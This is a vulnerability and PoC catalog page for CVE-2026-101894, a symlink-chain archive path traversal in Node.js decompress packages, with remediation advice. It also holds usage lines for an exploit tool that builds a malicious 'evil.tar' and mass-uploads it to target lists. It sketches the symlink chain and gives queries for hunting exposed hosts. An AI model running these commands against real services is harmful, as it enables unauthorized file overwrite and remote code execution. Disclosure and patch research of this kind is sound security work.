CVE-2026-101894 — @xhmikosr/decompress Symlink-Chain Archive Path Traversal
September 29, 2026 · 104 views
Node.js @xhmikosr/decompress (and unmaintained decompress): read/write outside output dir via chained symlink archive entries — bypass of CVE-2026-53486 hardening. Fixed in 10.2.2 / 11.1.4; kevva decompress ≤4.2.1 unpatched. CVSS 3.1 9.1 Critical. Python PoC: --lab, lockfile check, evil.tar upload exploit, mass -j.
Description
Overview
CVE-2026-101894 — archive extraction in @xhmikosr/decompress (and legacy decompress) allows read/write outside the output directory via a chain of symlink entries, bypassing CVE-2026-53486 mitigations.
| | |
|---|---|
| Package | @xhmikosr/decompress (maintained), decompress (kevva, unpatched) |
| API | Default decompress(input, output) |
| CWE | CWE-22 path traversal, CWE-59 link following |
| Fixed | 10.2.2 (10.x), 11.1.4 (11.x) |
| CVSS 3.1 | 9.1 Critical |
| GHSA | GHSA-hrh2-vp3x-79xf |
Lexical path checks fail when sequential symlink entries cause the kernel to resolve later entries outside the intended extract root. Attacker-controlled archives can overwrite or read configs, startup scripts, or sensitive files → RCE in CI, containers, and upload-and-extract services.
PoC page: https://pocbit.org/pocs/cve-2026-101894
GitHub: murrez/CVE-2026-101894
Affected versions
| Package | Vulnerable | Patched |
|---------|------------|---------|
| @xhmikosr/decompress 11.x | 11.0.0 – 11.1.3 | ≥ 11.1.4 |
| @xhmikosr/decompress 10.x | < 10.2.2 | ≥ 10.2.2 |
| decompress (kevva) | ≤ 4.2.1 | none — migrate |
Migrate legacy decompress to @xhmikosr/[email protected]+.
Bundled tool (Python 3)
Download poc.py from this page (View exploit code).
pip install -r requirements.txt
# Authoritative local proof (Node.js + npm required)
python poc.py --lab
python poc.py --write-evil-tar evil.tar
python poc.py -u https://app.example --mode check
python poc.py --list targets.example.txt --mode check -j 30 --vuln-list hits.txt
python poc.py -u https://app.example --mode exploit --aggressive
python poc.py --list hits.txt --mode exploit -j 10 --aggressive --upload-paths /api/upload,/upload
| Mode | Purpose |
|------|---------|
| --lab | Installs vulnerable 11.1.3 in lab/, verifies symlink-chain escape |
| --write-evil-tar | Writes payload archive (POCBIT-101894-ESCAPED marker) |
| check | Exposed package.json / lockfile → risky decompress version? |
| exploit | POST symlink-chain evil.tar to common upload paths (mass supported) |
| mass | --list + -j → hits.txt, exploited.txt |
Remote exploit proves 2xx upload acceptance + weak version fingerprint when lockfiles leak — not that the server actually extracted with decompress. Use --lab for definitive extraction proof.
Note: check → hits = public lockfile + vulnerable dep. exploit → exploited = at least one tried upload path returned 2xx. Many targets show vulnerable_dep_no_upload_endpoint (dependency leak without public archive upload).
evil.tar (concept)
Symlink chain (simplified):
a/b/c/up→../..a/b/escape→c/up/../..esc→..- Regular files with marker payload under escaped path
Matches the symlink-chain bypass class fixed in 11.1.4 (realpath / containment).
Remediation
- Upgrade
@xhmikosr/decompress≥ 11.1.4 (or ≥ 10.2.2 on 10.x). - Replace unmaintained
decompressentirely. - Never extract untrusted archives into sensitive roots; use isolated workers.
Hunting (examples)
body="node_modules/@xhmikosr/decompress"
body="\"decompress\"" && body="package-lock.json"
header="X-Powered-By: Express" && body="/package.json"
Lockfiles are rarely public in production; checks often hit staging, CI artifacts, or misconfigured static hosting.
Legal and ethical use
Test only systems you are authorized to assess. Do not upload malicious archives to third-party production services.
References
- NVD — CVE-2026-101894
- PoCbit catalog
- GitHub PoC — CVE-2026-101894
- Prior: CVE-2026-53486 / GHSA-mp2f-45pm-3cg9
Related PoCs
Same platform, vendor, or tags — explore more write-ups on Pocbit.
- Web appCVE-2026-100721critical
CVE-2026-100721 — vm2 NodeVM External Allowlist Bypass (Sandbox Escape)
Incorrect authorization (CWE-863) in vm2 npm before 3.12.2: NodeVM external allowlist and resolver path checks allow colliding package names (evil-left-pad) or prefix path tricks → host-context require and sandbox escape / host RCE when embedders run untrusted JS with require.external + custom resolve. CVSS 9.0/9.5 Critical. Python PoC: --lab (Node), check, remote exploit, mass -j.
- Web appCVE-2026-90817critical
CVE-2026-90817 — REDCap Unauthenticated RCE (Survey __passthru / Data Import)
Unauthenticated remote code execution in REDCap ≥ 13.3.0 via public survey __passthru routing and Data Import path handling. Patched in 16.0.49, 17.3.10, and 17.4.4+. Requires a valid public survey hash (s=) for the published check/exploit tooling.
- Web appCVE-2026-82384critical
CVE-2026-82384 — Apache Roller 6.1.5 XML-RPC Pre-Auth Java Deserialization
Unauthenticated Java deserialization (CWE-502) on Apache Roller 6.1.5 legacy XML-RPC servlet: enabledForExtensions allows ex:serializable before Blogger/MetaWeblog auth; mapping stays active even when XML-RPC is disabled in UI. Pre-auth RCE via attacker-controlled serialized objects (ysoserial/classpath gadgets). Fixed in 6.1.6+. CVSS 9.8 Critical. Python PoC: check, probe-deser, exploit, mass -j.
- Web appCVE-2026-48842high
CVE-2026-48842 — Roundcube Webmail Pre-Auth SQLi (virtuser_query)
Pre-authentication SQL injection in Roundcube Webmail via the virtuser_query plugin and a preg_replace() backslash escape bypass. Affects 1.6.x before 1.6.16 and 1.7.x before 1.7.1 (CVSS 3.1 8.1 HIGH).